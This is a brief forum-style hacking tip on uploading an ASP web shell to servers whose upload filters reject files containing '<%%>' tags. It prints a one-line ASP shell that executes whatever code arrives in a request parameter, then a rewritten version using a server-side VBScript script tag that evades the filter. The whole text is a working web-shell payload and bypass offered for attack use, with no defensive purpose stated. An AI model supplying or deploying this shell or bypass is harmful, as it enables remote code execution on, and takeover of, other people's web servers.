Many friends have said before that during the process of the program uploading the shell, the program does not allow files containing the <%%> mark symbol to be uploaded, so many shells cannot be uploaded! Then don’t we have any other way? Of course we do! hehe!
Let's take a look at the smallest ASP code with a blue screen:
<%execute request("l")%>
Let's change its label:
<script language=VBScript runat=server>execute request("l")</Script >
Haha! This avoids using <%%> and saves it as .asp. The program will still be executed and the effect will be the same!